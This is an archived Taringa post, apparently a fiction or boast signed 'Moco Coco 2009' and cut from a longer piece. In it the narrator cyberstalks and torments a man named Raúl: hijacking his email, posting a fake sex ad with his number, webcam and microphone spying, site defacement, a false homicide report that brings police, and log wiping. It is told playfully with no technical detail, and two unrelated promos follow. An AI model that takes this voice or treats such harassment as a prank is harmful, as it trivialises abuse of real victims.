que días antes había chateado desde una sala de uol. Lo salude atentamente y comencé a tratarlo de idiota al ponerle delante recuerdos que nunca se sucedieron. Grabe una a una sus reacciones y me reí viendo como cambiaba el tono de alegre-incrédulo-furioso-triste-melancólico-colérico, para luego, obviamente, hablar con el por msn haciéndome pasar por una mina y enviándole los mp3s de dichas charlas a modo de burla. Tiempo después, yo diría unos 5 días después de haberlo visto en la plaza, comencé a ver como reaccionaba si pensaba que era un productor de una disquera. Le comente que me habían dado su numero la gente de su ex banda y me dijo que el no tuvo nunca una banda, así que nos reímos un rato pensando que era una confusión pero aun así, alegando su buena disponibilidad y simpatía me interesaba conocerlo y rogué que me enviara un demo a una dirección ficticia. Sin desengañarlo de la anterior me adentre a contemplar sus ojos desde la web ante la idea siniestra de que yo era un mentalista. Le había robado datos suficientes como para presentarme vía pagina web (en realidad, hice un dns spoffing y cambie sus resultados de búsqueda en google para que pusiese lo que pusiera me encontrara) y así darle todos los datos de su pasado (mas arriesgando que otra cosa) e inclusive adentrarme en un futuro no incierto donde el volvería con la srita abortex. Por ultimo hackeando la pagina del diario Clarín (debo hacer una aclaración importante, no tengo nada en contra de Clarín, de hecho compre sus fascículos de la enciclopedia de la informática hasta completar los muchos tomos, pero es que entonces me parecía medio raro y diré que el / los admins de la pagina web y yo competíamos, yo los hackeaba, ellos se curaban, yo los hackeaba, ellos se curaban, era como un chiste interno, una rara forma y primitiva de conocer gente divertida) le hice creer una de marcianos muy buena que llego al punto de buscar si era cierto o no en mas de una decena de diarios internacionales. Lo mio fue muy a lo Orson Wells, un homenaje diría. Anyway, todavía lo mejor no había comenzado... Parte IV: Hacking! Esa noche desde la comodidad de mi cama, con notebook, Rammstein, mucho café y varios cigarrillos a medio fumar comencé: Lo halagué un poco después de un arduo día puesto que todo le había salido mal, se había quedado repetidamente sin señal de celu, parecía una broma, algo hacia que su teléfono intermitentemente sonara para avisarle que tenia, luego que no, luego que si, luego que no, un poco si, un poco, muy poco mas a la izquierda! No. Y luego si, durante todo el día. Lo habían llamado muchísima gente a la casa, también... publicar un clasificado de acompañante virgen real en el rubro 59 del clarín on line era toda una oportunidad! Tal fue el punto de acoso que termino por arrancar el cable de la línea. Encima algún cojonudo le había cambiado las contraseñas de todos sus emails así que ni eso pobre. Luego de quedarse sin saldo en el celular sin hacer una llamada o que al comprobar su deuda de patente el numero fuera tan grande como el aviso de EN GESTION JUDICIAL PARA REMATE, o que las paginas de rock avisaran que Pappo había muerto (cosa que no había sucedido entonces pero fue una visión futuristica mía sin quererlo) o que no pudiese ver nada de rock and pop, o que todos sus amigos le hayan mandado mensajes a la contestadora que conecto después de la calentura del día diciéndole que se fuera al carajo por las llamadas que había hecho, luego de todo eso, decidió que la computadora le daría consuelo. Y así fue. Primero lo deleite un rato con el mejor porno que hombre alguno haya visto, este rocker tenia una extraña fascinación por las enfermeras así que decidí por asco no contemplarlo cuando se masturbaba ante el menú del día. Luego una buena noticia, metallica había confirmado que vendría a Argentina! Para mejor las entradas estaban en venta on line y por ser él un visitante de numero abultado había ganado una reserva! Que maravilloso! Decidí mimarlo dándole cambiándole la clave del mail de su novia al que intentaba día a día entrar y que cedió curiosamente con los caracteres que representan su nombre. Así que un poco lo quería. Borre todos los mails que lo pondrían incomodo y deje que se sonrojara al leer otros mas amables donde una buena amiga intentaba demostrarle lo grandioso que era y aconsejaba volver con el. Sin reparar en excesos también le desfacé la pagina de un solista contrario al que el aparentaba no bancar. Muchas emociones para un día te pueden alterar la percepción, incluso lo deje ganar al ajedrez de la pagina de Yahoo (aunque en realidad me gano deberás, no era mi día de suerte) Ya mas relajado por las buenas noticias y aliviado de su pasión consumada intento llamar a un amigo para contarle las buenas nuevas, pero... el teléfono de línea no funcaba y el celular no respondía. Arranque entonces la segunda fase. Extraña información se sucedía a lo loco ante sus ojos, una elipse sin fin de datos personales aparecía repentinamente en su monitor, curriculums, fotos y deudas se abrían sobre las ventanas tan rápido que cuando fijaba la vista para leer se desvanecían para dejarle un solo recuerdo visual de su nombre desde un Form. Ahí comenzó a desquiciarse. La contestadora repentinamente dejó pasar dos llamadas y atendió al tercer tono para que una vos de bebe le riera, asimismo su celular comenzó a sonar y una mujer llorando como en una grabación se repetía desde el auricular. Casualmente un patrullero llegaba a su edificio junto con dos ambulancias puesto que alguien había denunciado falso un homicidio en el departamento de al lado, al mismo tiempo que la pc comenzó a mostrar fotos de asesinatos con el area de Batch repiqueteando frenético en sus 5 canales. Hasta donde querés llegar hoy? Lo observaba desde la web cam en medio del monoambiente correr del teléfono a la pc, con el celular y un vaso en la mano mientras decía “Hola hola” al bebe grabado o a la mujer llorosa. La imagen se cortaba y cuadro por cuadro lo vi sentarse en el sillón, pero no apagaba la pc, solo el monitor que violento contra el botón se presiono para acallarlo. Batch todavía no había terminado y yo había abierto su micrófono para escucharlo y ahora el area de mi cuarto se inundaba de esa tersura. Una suavidad tan extrema que cuando concluyo el se desespero mas e intento de nuevo llamar a un amigo. Hasta donde querés llegar hoy? -Parece como que un hacker se metió en mi vida –gritaba desesperado a su amigo, y yo del otro lado pensaba “no me tentéis...” Entonces, entre el patrullero, la luz de la ambulancia, una extraña corrida en el pasillo de alguien que fue a atender, la pc con sus fotos que el no veía, la comunicación del celular cortado, el bebe llorando ahora por teléfono junto con la mujer ahora formando un coro comencé a hablar. Tras cinco minutos de esa locura dije: -hola, hola, Raúl? Ramonero querido estas ahí? Vamos Raúl, no te preocupes, puedo oírte hablame, no estas loco, hablame y prende el monitor. Callado prendió el monitor. La web cam me mostraba a un transpirado Raúl, cansado y con el torso desnudo. Había preparado yo una animación 3d desde el 3dme now en tres patadas así que mi cara mal digitalizada abarcaba sus 800 x 600 px. -Vamos, no te enojes mi alma, no te preocupes, esto no es real, es como una pesadilla. Obviamente no me respondía. La animación que parecía emular mi boca hablar loppaba incesante aunque yo no lo hiciese. -Tranquilo, esto es solo un test, No tiene que ver con vos, es una forma de que veas todo aquello que no te gusta y escapas, ahora enfrentalo tranquilo desde la paz de saber que no es real, le temes a la locura, te ataste al recuerdo de una chica, te refugias en tu música de toda la agresión a la que pretendes llamar y aparentas ser violento, acaso no buscabas paz en una época? No eras el que conciliaba en toda discusión cuando era chico según le contabas a tus amigos? Ahora trata de conciliarte con vos mismo. Lo ultimo que vi por web cam fue arrancar el cable de internet muy violento y la imagen de mi monitorcito de Notebook se congelo para luego decirme que el usuario estaba desconectado... Parte V: Del *.log Finalmente me quede emocionado y durante toda la noche repare todo lo que había descompuesto, repuse las web desfasadas y borre las mentiras de Pappo y de Metalica. Baje los videos de enfermeras y elimine los archivos de logs de medio país. Todo esto me llevo gran parte de la noche pero era la retirada, un momento único donde ya no había sorpresas, donde diste lo mejor durante el show, era el silencio de los pies que salen de la sala, el murmullo de agradecimiento por el espectáculo ofrecido. Era como subir todo a un gran camión para mandarlo a un deposito donde otros se harían cargo. Es mas, formatee mi disco rígido, no se porque, me sentía sucio creo, pero no sucio de maldad, no me afectaba eso, sucio como un cantante que termina bajando del escenario todo transpirado por haber brillado ante las luces. Borre todo y tire todas las referencias a Raulsito. Durante esa semana que sucedió a la del hack completo de este muchacho, semana de vacaciones había encontrado la forma perfecta de demostrarme muchas miles de cosas que por hoy voy a omitir. Pero la semana que siguió fue la paz absoluta, no toque una maquina en todos los días, no pensé en hacking, guarde a Rammtein y lo cambie por un Vivaldi suave que admiraba en muy pocas ocasiones. Me dedique a ver que era de mi vida entonces. Daños colaterales? 0 kills. Moco Coco 2009 Pd: En cuanto a Raúl, deberé decir que se fue a vivir con su padre y que cuando voy a Capital Federal a veces lo veo comprando en el día % menos comida, muy limpio y jugando con una chica que no se quien sea. Daños colaterales? -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. http://www.taringa.net/comunidades/escritoresmalditos/ Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

30
0
E
Extraño experimento en vhs: El Adios.
HumorporAnónimo12/31/2014

Marcelo se cagó muriendo. Pasa, y aun dolidos, el equipo de moco tv (el vhs team) tuvo la excusa perfecta para mostrar el top del año. MocoTv se viste de gala en este vídeo, deseando que esta año que entra sea de perfección y toda esa mierda. Muchas sorpresa para nuestros 15 (si, quince!) suscriptores y amigos de la casa. ¡Unite al club de fans! visita el blog, y si nos ves por la calle hacenos el amor, como nadie nos lo ha hecho hasta ahora. Si te querés suscribir, suscribite, nos vas a hacer feliz, acordate, somos vírgenes, seria nuestra única alegría. link: https://www.youtube.com/watch?v=ijNeYuCnqWQ

15
0
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.